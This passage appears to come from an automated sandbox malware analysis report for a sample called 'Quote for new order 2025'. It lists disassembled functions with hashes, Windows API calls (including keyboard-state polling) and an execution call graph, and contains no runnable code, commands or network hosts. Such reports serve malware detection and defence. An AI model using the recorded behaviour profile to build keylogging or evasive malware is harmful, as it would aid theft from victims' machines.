                                                                                                                                                        • Instruction Fuzzy Hash: 0101DBB120A3489EE7109A19CDC47A7FFDCEF51764F18C86AED194A2D6C279D880C671
                                                                                                                                                        Function 0091D6E7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: addc953f1a0b689ab9ad3f5d9c5940c0f6463386851b51f88bbab129a35b2ab0
                                                                                                                                                        • Instruction ID: f31766d1917a9450947dee32d6d4d846c415274643e7c7f7017b0da1aeeb9e59
                                                                                                                                                        • Opcode Fuzzy Hash: addc953f1a0b689ab9ad3f5d9c5940c0f6463386851b51f88bbab129a35b2ab0
                                                                                                                                                        • Instruction Fuzzy Hash: FDF0F9B6200644AF97218F0AD984C67FBADEBC5770719C59AE84A4B752C671EC42CEA0
                                                                                                                                                        Function 0091D75C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c0133c72f0d615eb61b0853eef7f3b74e28f598c1bc21df474cdc3ea3a5bf7d8
                                                                                                                                                        • Instruction ID: 78c975a867b29878008ec9317b4ead900caaab4ce67a77d29822778b8028e2a8
                                                                                                                                                        • Opcode Fuzzy Hash: c0133c72f0d615eb61b0853eef7f3b74e28f598c1bc21df474cdc3ea3a5bf7d8
                                                                                                                                                        • Instruction Fuzzy Hash: EDF062715053449EE7108A1AC8C4BA6FFACEF51724F18C85AED584A296C2799884CAB1
                                                                                                                                                        Function 0091D6D8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1e449dd5f91ce6c9141fcd9da0c3983f3746b711bb31c6f0ba2bfa425fa75e91
                                                                                                                                                        • Instruction ID: f3e06bf0dc82e3bb8d304be43abdc976512352490913fb9ee1ecf2d01e3cffde
                                                                                                                                                        • Opcode Fuzzy Hash: 1e449dd5f91ce6c9141fcd9da0c3983f3746b711bb31c6f0ba2bfa425fa75e91
                                                                                                                                                        • Instruction Fuzzy Hash: AAF03C75204684AFD3168F05C984C62BFB9EF8A7607198889E89A4B362C631FC42CF60

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 06F5E8B0 Relevance: 7.6, APIs: 5, Instructions: 114keyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyState.USER32(00000001), ref: 06F5E90D
                                                                                                                                                        • GetKeyState.USER32(00000002), ref: 06F5E952
                                                                                                                                                        • GetKeyState.USER32(00000004), ref: 06F5E997
                                                                                                                                                        • GetKeyState.USER32(00000005), ref: 06F5E9DC
                                                                                                                                                        • GetKeyState.USER32(00000006), ref: 06F5EA21
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: State
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1649606143-0
                                                                                                                                                        • Opcode ID: c91d680347e1b8ea299966d3d1d915b887a286a3d463608d5cadd5c34c1f52bf
                                                                                                                                                        • Instruction ID: b443142f0f704640b119eca6443b1f56b7eea96bd785566273232620a0571e78
                                                                                                                                                        • Opcode Fuzzy Hash: c91d680347e1b8ea299966d3d1d915b887a286a3d463608d5cadd5c34c1f52bf
                                                                                                                                                        • Instruction Fuzzy Hash: 83419171C00785CEEB51CF59C9483AFBFF4AB06308F248459D598B7290C7B89A45CFA6

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:9.9%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                        Total number of Nodes:223
                                                                                                                                                        Total number of Limit Nodes:34
                                                                                                                                                        execution_graph 41222 8c173e0 41224 8c17419 41222->41224 41223 8c174dd 41224->41223 41225 8c10338 2 API calls 41224->41225 41225->41223 41163 8c17842 41166 8c10338 41163->41166 41168 8c10343 41166->41168 41167 8c11257 41168->41167 41171 8c18ec0 41168->41171 41176 8c18ed0 41168->41176 41173 8c18ed0 41171->41173 41172 8c18f62 41172->41167 41173->41172 41181 8c19800 41173->41181 41186 8c19739 41173->41186 41178 8c18ef2 41176->41178 41177 8c18f62 41177->41167 41178->41177 41179 8c19800 2 API calls 41178->41179 41180 8c19739 2 API calls 41178->41180 41179->41177 41180->41177 41182 8c19805 41181->41182 41191 8c19821 41182->41191 41196 8c19830 41182->41196 41183 8c1981c 41183->41172 41187 8c1975b 41186->41187 41188 8c1975f 41187->41188 41190 8c19800 2 API calls 41187->41190 41188->41172 41189 8c1978c 41189->41172 41190->41189 41192 8c19830 41191->41192 41193 8c199b8 41192->41193 41201 7590449 41192->41201 41205 7590458 41192->41205 41193->41183 41197 8c19866 41196->41197 41198 8c199b8 41197->41198 41199 7590449 GetSysColorBrush 41197->41199 41200 7590458 GetSysColorBrush 41197->41200 41198->41183 41199->41198 41200->41198 41203 7590458 41201->41203 41202 759087b 41202->41193 41203->41202 41204 75908be GetSysColorBrush 41203->41204 41204->41202 41206 75904d6 41205->41206 41207 759087b 41206->41207 41208 75908be GetSysColorBrush 41206->41208 41207->41193 41208->41207 41252 2a57540 41253 2a57586 GetCurrentProcess 41252->41253 41255 2a575d1 41253->41255 41256 2a575d8 GetCurrentThread 41253->41256 41255->41256 41257 2a57615 GetCurrentProcess 41256->41257 41258 2a5760e 41256->41258 41261 2a5764b 41257->41261 41258->41257 41259 2a57673 GetCurrentThreadId 41260 2a576a4 41259->41260 41261->41259 41226 759f7f1 41228 759f821 41226->41228 41227 759fc00 WaitMessage 41227->41228 41228->41227 41229 759f8ac 41228->41229 41232 759fcf8 41228->41232 41236 759fd00 PeekMessageW 41228->41236 41233 759fd55 PeekMessageW 41232->41233 41235 759fcfb 41232->41235 41234 759fd77 41233->41234 41234->41228 41235->41233 41237 759fd77 41236->41237 41237->41228 41209 8c110c8 41210 8c111f7 41209->41210 41212 8c110f5 41209->41212 41211 8c11115 41212->41211 41213 8c10338 2 API calls 41212->41213 41213->41211 41238 2a57788 DuplicateHandle 41239 2a5781e 41238->41239 41240 759ed68 41241 759ed8f 41240->41241 41244 759d384 41241->41244 41245 759d38f 41244->41245 41246 759ef9f GetCurrentThreadId 41245->41246 41247 759edb3 41245->41247 41246->41247 41262 759ff28 KiUserCallbackDispatcher 41263 759ff9c 41262->41263 41264 759f12b 41265 759f13e 41264->41265 41269 759f368 PostMessageW 41265->41269 41271 759f340 41265->41271 41266 759f161 41270 759f3d4 41269->41270 41270->41266 41272 759f368 PostMessageW 41271->41272 41273 759f3d4 41272->41273 41273->41266 41214 75c0848 DispatchMessageW 41215 75c08b4 41214->41215 41216 75c5848 DispatchMessageA 41217 75c58b4 41216->41217 41274 2a5fad0 41275 2a5fb38 CreateWindowExW 41274->41275 41277 2a5fbf4 41275->41277 41218 7590040 41219 759008e DrawTextExW 41218->41219 41221 75900e6 41219->41221 41278 2a56d58 41279 2a56d68 41278->41279 41280 2a56d79 41279->41280 41283 2a56db7 41279->41283 41288 2a56e7f 41279->41288 41284 2a56df2 41283->41284 41285 2a56ee9 41284->41285 41293 2a57020 41284->41293 41297 2a57013 41284->41297 41285->41280 41289 2a56e84 41288->41289 41290 2a56ee9 41289->41290 41291 2a57020 9 API calls 41289->41291 41292 2a57013 9 API calls 41289->41292 41290->41280 41291->41290 41292->41290 41296 2a5702d 41293->41296 41294 2a57067 41294->41285 41296->41294 41301 2a56a90 41296->41301 41298 2a5702d 41297->41298 41299 2a57067 41298->41299 41300 2a56a90 9 API calls 41298->41300 41299->41285 41300->41299 41302 2a56a95 41301->41302 41304 2a57d80 41302->41304 41305 2a57204 41302->41305 41304->41304 41306 2a5720f 41305->41306 41307 2a57dfe 41306->41307 41322 2a5adf0 41306->41322 41333 2a5b330 41306->41333 41341 2a5af08 41306->41341 41352 2a5b168 41306->41352 41361 2a5b340 41306->41361 41369 2a5aef8 41306->41369 41380 2a5ade3 41306->41380 41391 2a57234 41307->41391 41309 2a57e18 41396 2a57244 41309->41396 41312 2a57e29 41312->41304 41323 2a5ae28 41322->41323 41324 2a5af08 3 API calls 41323->41324 41326 2a5ae7d 41323->41326 41325 2a5b197 41324->41325 41330 2a5b397 41325->41330 41332 2a5b2ea 41325->41332 41410 2a5a0a4 GetFocus 41325->41410 41326->41307 41328 2a5b43f 41329 2a57244 3 API calls 41328->41329 41328->41332 41329->41332 41330->41328 41331 2a5b43a KiUserCallbackDispatcher 41330->41331 41330->41332 41331->41328 41332->41307 41334 2a5b36e 41333->41334 41338 2a5b397 41334->41338 41340 2a5b4ab 41334->41340 41411 2a5a0a4 GetFocus 41334->41411 41336 2a5b43f 41337 2a57244 4 API calls 41336->41337 41336->41340 41337->41340 41338->41336 41339 2a5b43a KiUserCallbackDispatcher 41338->41339 41338->41340 41339->41336 41342 2a5af2a 41341->41342 41344 2a5af90 41341->41344 41343 2a5af08 3 API calls 41342->41343 41342->41344 41345 2a5b197 41343->41345 41344->41307 41349 2a5b397 41345->41349 41350 2a5b2ea 41345->41350 41412 2a5a0a4 GetFocus 41345->41412 41347 2a5b43f 41348 2a57244 3 API calls 41347->41348 41347->41350 41348->41350 41349->41347 41349->41350 41351 2a5b43a KiUserCallbackDispatcher 41349->41351 41350->41307 41351->41347 41353 2a5af08 4 API calls 41352->41353 41354 2a5b197 41352->41354 41353->41354 41358 2a5b397 41354->41358 41360 2a5b2ea 41354->41360 41413 2a5a0a4 GetFocus 41354->41413 41356 2a5b43f 41357 2a57244 4 API calls 41356->41357 41356->41360 41357->41360 41358->41356 41359 2a5b43a KiUserCallbackDispatcher 41358->41359 41358->41360 41359->41356 41360->41307 41362 2a5b36e 41361->41362 41365 2a5b4ab 41362->41365 41367 2a5b397 41362->41367 41414 2a5a0a4 GetFocus 41362->41414 41364 2a5b43f 41364->41365 41366 2a57244 4 API calls 41364->41366 41366->41365 41367->41364 41367->41365 41368 2a5b43a KiUserCallbackDispatcher 41367->41368 41368->41364 41370 2a5af2a 41369->41370 41372 2a5af90 41369->41372 41371 2a5af08 4 API calls 41370->41371 41370->41372 41373 2a5b197 41371->41373 41372->41307 41377 2a5b397 41373->41377 41379 2a5b2ea 41373->41379 41415 2a5a0a4 GetFocus 41373->41415 41375 2a5b43f 41376 2a57244 4 API calls 41375->41376 41375->41379 41376->41379 41377->41375 41378 2a5b43a KiUserCallbackDispatcher 41377->41378 41377->41379 41378->41375 41379->41307 41381 2a5ae28 41380->41381 41382 2a5af08 4 API calls 41381->41382 41384 2a5ae7d 41381->41384 41383 2a5b197 41382->41383 41388 2a5b397 41383->41388 41390 2a5b2ea 41383->41390 41416 2a5a0a4 GetFocus 41383->41416 41384->41307 41386 2a5b43f 41387 2a57244 4 API calls 41386->41387 41386->41390 41387->41390 41388->41386 41389 2a5b43a KiUserCallbackDispatcher 41388->41389 41388->41390 41389->41386 41390->41307 41393 2a5723f 41391->41393 41395 2a5c891 41393->41395 41417 2a5c198 41393->41417 41394 2a5c88c 41394->41309 41395->41309 41397 2a5724f 41396->41397 41398 2a5cf4f 41397->41398 41421 2a5c29c 41397->41421 41400 2a5adf0 4 API calls 41398->41400 41401 2a57e1f 41400->41401 41402 2a5d120 41401->41402 41406 2a5d108 41401->41406 41403 2a5d151 41402->41403 41404 2a5d15d 41402->41404 41403->41404 41430 2a5d488 41403->41430 41404->41312 41407 2a5d151 41406->41407 41408 2a5d15d 41406->41408 41407->41408 41409 2a5d488 GetModuleHandleW 41407->41409 41408->41312 41409->41408 41410->41330 41411->41338 41412->41349 41413->41358 41414->41367 41415->41377 41416->41388 41418 2a5c1a3 41417->41418 41419 2a57244 4 API calls 41418->41419 41420 2a5ca75 41418->41420 41419->41420 41420->41394 41422 2a5c2a7 41421->41422 41423 2a5d022 41422->41423 41425 2a5d0c1 41422->41425 41428 2a5d120 GetModuleHandleW 41422->41428 41429 2a5d108 GetModuleHandleW 41422->41429 41424 2a5adf0 4 API calls 41423->41424 41426 2a5d03f 41424->41426 41425->41398 41426->41425 41427 2a5c29c 4 API calls 41426->41427 41427->41426 41428->41423 41429->41423 41433 2a5d4c8 41430->41433 41431 2a5d492 41431->41404 41434 2a5d50c 41433->41434 41435 2a5d4e9 41433->41435 41434->41431 41435->41434 41436 2a5d710 GetModuleHandleW 41435->41436 41437 2a5d73d 41436->41437 41437->41431

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 07590458 Relevance: 2.0, APIs: 1, Instructions: 514COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2739 7590458-75904e2 call 7590cf1 2742 7590544-7590555 2739->2742 2743 75904e4-759053e call 75915b7 2739->2743 2747 75905ce-759061e 2742->2747 2748 7590557-75905c4 2742->2748 2743->2742 2755 7590626-759064f 2747->2755 2847 75905c6 call 7592718 2748->2847 2848 75905c6 call 7592791 2748->2848 2754 75905cc 2754->2755 2758 7590656-7590658 2755->2758 2759 759065e-7590666 2758->2759 2760 7590ab6-7590ac9 2758->2760 2761 759072a 2759->2761 2762 759066c-7590673 2759->2762 2770 7590acf-7590ad6 2760->2770 2771 7590c42-7590c66 2760->2771 2766 759072c-7590736 2761->2766 2763 759067c-7590683 2762->2763 2764 7590675-759067a 2762->2764 2768 7590689-7590699 2763->2768 2769 7590685-7590687 2763->2769 2767 759069c-759069e 2764->2767 2772 7590738-759074f 2766->2772 2773 7590751-75907a5 2766->2773 2774 75906a4-75906ab 2767->2774 2775 7590726 2767->2775 2768->2767 2769->2767 2770->2771 2782 7590adc-7590c37 2770->2782 2777 75907a6-75907cc 2772->2777 2773->2777 2785 75906ad-75906b4 2774->2785 2786 7590722 2774->2786 2778 7590728 2775->2778 2787 7590959-759095b 2777->2787 2788 75907d2-75907dc 2777->2788 2778->2766 2782->2771 2799 75906c2 2785->2799 2800 75906b6-75906c0 2785->2800 2789 7590724 2786->2789 2787->2760 2790 7590961-7590977 2787->2790 2792 75907e9 2788->2792 2793 75907de-75907e7 2788->2793 2789->2778 2790->2760 2802 759097d-7590996 2790->2802 2794 75907eb-75907ed 2792->2794 2793->2794 2794->2787 2796 75907f3-75907fc 2794->2796 2796->2787 2807 7590802-7590830 2796->2807 2801 75906c4-75906c6 2799->2801 2800->2801 2801->2786 2804 75906c8-75906db 2801->2804 2813 7590998-75909b6 2802->2813 2814 75909bd-7590aa5 2802->2814 2815 759071b-7590720 2804->2815 2816 75906dd-75906ef 2804->2816 2811 759083d 2807->2811 2812 7590832-759083b 2807->2812 2817 759083f-7590879 2811->2817 2812->2817 2813->2814 2844 7590ab3 2814->2844 2845 7590aa7 2814->2845 2815->2789 2816->2815 2826 75906f1-7590703 2816->2826 2820 759087b-759089b 2817->2820 2821 759089d-75908ff GetSysColorBrush 2817->2821 2829 7590914-7590954 2820->2829 2830 7590908-7590912 2821->2830 2831 7590901-7590907 2821->2831 2837 7590705-7590715 2826->2837 2838 7590717-7590719 2826->2838 2829->2787 2830->2829 2831->2830 2837->2789 2838->2789 2844->2760 2845->2844 2847->2754 2848->2754
                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(00000000), ref: 075908E8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BrushColor
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 464657469-0
                                                                                                                                                        • Opcode ID: e15181550c9075b82caad276100725e6a955eb9c22b4bedff3aaa2e97d88ed99
                                                                                                                                                        • Instruction ID: 609cca388f74be712d9939a8194909424c656440fc95b29d134c0b6f5cd90925
                                                                                                                                                        • Opcode Fuzzy Hash: e15181550c9075b82caad276100725e6a955eb9c22b4bedff3aaa2e97d88ed99
                                                                                                                                                        • Instruction Fuzzy Hash: B8320875A0061ACFDB21DF64C984BD9B7B2FF49300F1485EAE40DAB261DB71AA84DF40
                                                                                                                                                        Function 0759F7F1 Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2960 759f7f1-759f828 2962 759fc59 2960->2962 2963 759f82e-759f842 2960->2963 2966 759fc5e-759fc74 2962->2966 2964 759f871-759f890 2963->2964 2965 759f844-759f86e 2963->2965 2972 759f8a8-759f8aa 2964->2972 2973 759f892-759f898 2964->2973 2965->2964 2976 759f8c9-759f8d2 2972->2976 2977 759f8ac-759f8c4 2972->2977 2974 759f89a 2973->2974 2975 759f89c-759f89e 2973->2975 2974->2972 2975->2972 2979 759f8da-759f8e1 2976->2979 2977->2966 2980 759f8eb-759f8f2 2979->2980 2981 759f8e3-759f8e9 2979->2981 2983 759f8fc 2980->2983 2984 759f8f4-759f8fa 2980->2984 2982 759f8ff-759f913 2981->2982 3060 759f915 call 759fcf8 2982->3060 3061 759f915 call 759fd00 2982->3061 2983->2982 2984->2982 2985 759f91a-759f91c 2986 759fa71-759fa75 2985->2986 2987 759f922-759f929 2985->2987 2989 759fa7b-759fa7f 2986->2989 2990 759fc44-759fc57 2986->2990 2987->2962 2988 759f92f-759f96c 2987->2988 2998 759fc3a-759fc3e 2988->2998 2999 759f972-759f977 2988->2999 2991 759fa99-759faa2 2989->2991 2992 759fa81-759fa94 2989->2992 2990->2966 2994 759fad1-759fad8 2991->2994 2995 759faa4-759face 2991->2995 2992->2966 2996 759fade-759fae5 2994->2996 2997 759fb77-759fb8c 2994->2997 2995->2994 3001 759fb14-759fb36 2996->3001 3002 759fae7-759fb11 2996->3002 2997->2998 3011 759fb92-759fb94 2997->3011 2998->2979 2998->2990 3003 759f9a9-759f9be call 759d488 2999->3003 3004 759f979-759f987 call 759d470 2999->3004 3001->2997 3038 759fb38-759fb42 3001->3038 3002->3001 3009 759f9c3-759f9c7 3003->3009 3004->3003 3018 759f989-759f9a2 call 759d47c 3004->3018 3014 759f9c9-759f9db call 759d494 3009->3014 3015 759fa38-759fa45 3009->3015 3016 759fbe1-759fbfe 3011->3016 3017 759fb96-759fbcf 3011->3017 3041 759fa1b-759fa33 3014->3041 3042 759f9dd-759fa0d 3014->3042 3015->2998 3028 759fa4b-759fa55 call 759d4a4 3015->3028 3016->2998 3034 759fc00-759fc2c WaitMessage 3016->3034 3031 759fbd8-759fbdf 3017->3031 3032 759fbd1-759fbd7 3017->3032 3027 759f9a7 3018->3027 3027->3009 3044 759fa64-759fa67 call 759d4bc 3028->3044 3045 759fa57-759fa5a call 759d4b0 3028->3045 3031->2998 3032->3031 3035 759fc2e 3034->3035 3036 759fc33 3034->3036 3035->3036 3036->2998 3049 759fb5a-759fb75 3038->3049 3050 759fb44-759fb4a 3038->3050 3041->2966 3056 759fa0f 3042->3056 3057 759fa14 3042->3057 3053 759fa6c 3044->3053 3052 759fa5f 3045->3052 3049->2997 3049->3038 3054 759fb4c 3050->3054 3055 759fb4e-759fb50 3050->3055 3052->2998 3053->2998 3054->3049 3055->3049 3056->3057 3057->3041 3060->2985 3061->2985
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6c745df27b6af2ba719fdcc6bc6c037be576b4764aef5759ff3dc74c634c5ef6
                                                                                                                                                        • Instruction ID: 5a07d3acc622e397857d3aacadb59f00d9fcaf71ba7a09354cbc28fb7aa631ed
                                                                                                                                                        • Opcode Fuzzy Hash: 6c745df27b6af2ba719fdcc6bc6c037be576b4764aef5759ff3dc74c634c5ef6
                                                                                                                                                        • Instruction Fuzzy Hash: 72D14BB0A0020ACFDF14DFA9C948BADBBF2FF44314F148569E409AF2A5DB75A945CB41
                                                                                                                                                        Function 02A57530 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1510 2a57530-2a575cf GetCurrentProcess 1514 2a575d1-2a575d7 1510->1514 1515 2a575d8-2a5760c GetCurrentThread 1510->1515 1514->1515 1516 2a57615-2a57649 GetCurrentProcess 1515->1516 1517 2a5760e-2a57614 1515->1517 1519 2a57652-2a5766d call 2a5770f 1516->1519 1520 2a5764b-2a57651 1516->1520 1517->1516 1523 2a57673-2a576a2 GetCurrentThreadId 1519->1523 1520->1519 1524 2a576a4-2a576aa 1523->1524 1525 2a576ab-2a5770d 1523->1525 1524->1525
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02A575BE
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 02A575FB
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02A57638
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02A57691
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: 290f696b3ed3c8691f04b79871e8d1bb5ef6c56ed47a50dc12eb91587c5c6a21
                                                                                                                                                        • Instruction ID: 9a981ab5fee6e232307404b9706a5f8600a1ed57367181a4510aff2f054e9987
                                                                                                                                                        • Opcode Fuzzy Hash: 290f696b3ed3c8691f04b79871e8d1bb5ef6c56ed47a50dc12eb91587c5c6a21
                                                                                                                                                        • Instruction Fuzzy Hash: FF5146B0900349CFDB04CFAAD548BEEBBF1EB48318F208459D459AB2A1DB34A944CF65
                                                                                                                                                        Function 02A57540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1532 2a57540-2a575cf GetCurrentProcess 1536 2a575d1-2a575d7 1532->1536 1537 2a575d8-2a5760c GetCurrentThread 1532->1537 1536->1537 1538 2a57615-2a57649 GetCurrentProcess 1537->1538 1539 2a5760e-2a57614 1537->1539 1541 2a57652-2a5766d call 2a5770f 1538->1541 1542 2a5764b-2a57651 1538->1542 1539->1538 1545 2a57673-2a576a2 GetCurrentThreadId 1541->1545 1542->1541 1546 2a576a4-2a576aa 1545->1546 1547 2a576ab-2a5770d 1545->1547 1546->1547
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02A575BE
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 02A575FB
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02A57638
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02A57691
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: 16deee04861a55257ab8999fc1f0189b438f61c7d496585ff5646ae72c56169d
                                                                                                                                                        • Instruction ID: e2c77f2d7a5c828211a5d8b091c721fbf2c40fa6687cad52991359df4ae4e673
                                                                                                                                                        • Opcode Fuzzy Hash: 16deee04861a55257ab8999fc1f0189b438f61c7d496585ff5646ae72c56169d
                                                                                                                                                        • Instruction Fuzzy Hash: F85136B0900249DFDB14DFAAD548BEEFBF1EB48318F208459E419A7260DB34A984CF65
                                                                                                                                                        Function 02A5D4C8 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 3062 2a5d4c8-2a5d4e7 3063 2a5d513-2a5d517 3062->3063 3064 2a5d4e9-2a5d4f6 call 2a5c374 3062->3064 3065 2a5d519-2a5d523 3063->3065 3066 2a5d52b-2a5d56c 3063->3066 3071 2a5d50c 3064->3071 3072 2a5d4f8 3064->3072 3065->3066 3073 2a5d56e-2a5d576 3066->3073 3074 2a5d579-2a5d587 3066->3074 3071->3063 3117 2a5d4fe call 2a5d761 3072->3117 3118 2a5d4fe call 2a5d770 3072->3118 3073->3074 3075 2a5d589-2a5d58e 3074->3075 3076 2a5d5ab-2a5d5ad 3074->3076 3079 2a5d590-2a5d597 call 2a5c380 3075->3079 3080 2a5d599 3075->3080 3078 2a5d5b0-2a5d5b7 3076->3078 3077 2a5d504-2a5d506 3077->3071 3081 2a5d648-2a5d708 3077->3081 3082 2a5d5c4-2a5d5cb 3078->3082 3083 2a5d5b9-2a5d5c1 3078->3083 3085 2a5d59b-2a5d5a9 3079->3085 3080->3085 3112 2a5d710-2a5d73b GetModuleHandleW 3081->3112 3113 2a5d70a-2a5d70d 3081->3113 3086 2a5d5cd-2a5d5d5 3082->3086 3087 2a5d5d8-2a5d5e1 call 2a5c390 3082->3087 3083->3082 3085->3078 3086->3087 3093 2a5d5e3-2a5d5eb 3087->3093 3094 2a5d5ee-2a5d5f3 3087->3094 3093->3094 3095 2a5d5f5-2a5d5fc 3094->3095 3096 2a5d611-2a5d615 3094->3096 3095->3096 3098 2a5d5fe-2a5d60e call 2a5c148 call 2a5c3a0 3095->3098 3119 2a5d618 call 2a5da41 3096->3119 3120 2a5d618 call 2a5da50 3096->3120 3098->3096 3099 2a5d61b-2a5d61e 3102 2a5d641-2a5d647 3099->3102 3103 2a5d620-2a5d63e 3099->3103 3103->3102 3114 2a5d744-2a5d758 3112->3114 3115 2a5d73d-2a5d743 3112->3115 3113->3112 3115->3114 3117->3077 3118->3077 3119->3099 3120->3099
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 02A5D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 7aea982effceb467a4b57346225a424efdbec9ca2e9f7552a53b8f2fe0507854
                                                                                                                                                        • Instruction ID: 73ea5922dcbcda122a5eec9c21bf17793accd8d6339ec705e3b9dd3764dbe676
                                                                                                                                                        • Opcode Fuzzy Hash: 7aea982effceb467a4b57346225a424efdbec9ca2e9f7552a53b8f2fe0507854
                                                                                                                                                        • Instruction Fuzzy Hash: B0812470A00B158FD724DF69D19075BBBF2FF88314F00896ED88A9BA50DB34E846CB91
                                                                                                                                                        Function 02A5FAD0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

